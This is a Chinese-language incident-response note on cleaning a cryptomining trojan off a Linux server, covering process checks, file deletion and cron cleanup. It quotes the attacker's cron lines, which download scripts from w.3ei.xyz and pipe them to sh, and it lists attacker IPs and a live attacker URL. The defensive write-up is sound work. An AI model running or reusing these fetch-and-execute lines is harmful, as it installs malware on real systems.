清除 挖矿脚本 攻击

1.查看系统进程,是否有异常: top

发现CPU占用率200%，判定服务器已经被植入木马

2.查看异常进程是哪一个程序造成的 ls -al /proc/14618

发现恶意程序（绿色的是可执行文件）/etc/lafy

3.删除恶意程序

cd  /etc

rm -rf lzfy

4.发现过了一会，lzfy恶意程序再次出现，怀疑是个定时任务

查看定时任务 crontab -l

发现有3个下载的可疑行为，下载木马脚本

一共发现3个可疑的攻击脚本的网络地址

*/13 * * * * url -fsSL http://w.3ei.xyz:43768/lll.sh | sh

*/2 * * * * wget -O .cmd http://w.3ei.xyz:43768/lll.sh && bash .cmd

*/12 * * * * curl -fsSL http://w.3ei.xyz:43768/crontab.sh | sh

先杀死程序 kill -9 14618

清除定时任务 crontab -e

如果定时任务不能删除可能是文件属性+i操作

cd var/spool/cron

chattr -ia cron

删除root用户的定时任务

rm -rf root

再次删除恶意程序

cd  /etc

rm -rf lzfy

 

5.清除临时目录其他可疑文件

cd tmp

ll

 

6.查看可疑的网络连接

lsof -i

lsof -c lzfy

7.追踪攻击者IP

ping 域名获取攻击者IP地址

打开cmd

ping w.3ei.xyz

获得IP地址为220.194.237.43

8.最后拿到的可疑IP地址列表

47.101.30.124

218.28.144.38

140.143.35.89

将上述IP列表加入黑名单即可。

9.附件：从服务器上查看近期上传的可疑文件

  

10.最终获得所有黑客攻击的文件，

3个shell脚本

crontab.sh,lll.sh,update.sh

3个exe攻击程序副本

bajx,lzfy,pvds

1个js挖矿脚本

3个试探攻击文件

rzx,systemctI,yums

 

（撒花）晒尸体

黑客hello网站地址：

http://w.3ei.xyz:43768/

 

 

 

 

作者：xzlAwin

日期：2019.04.24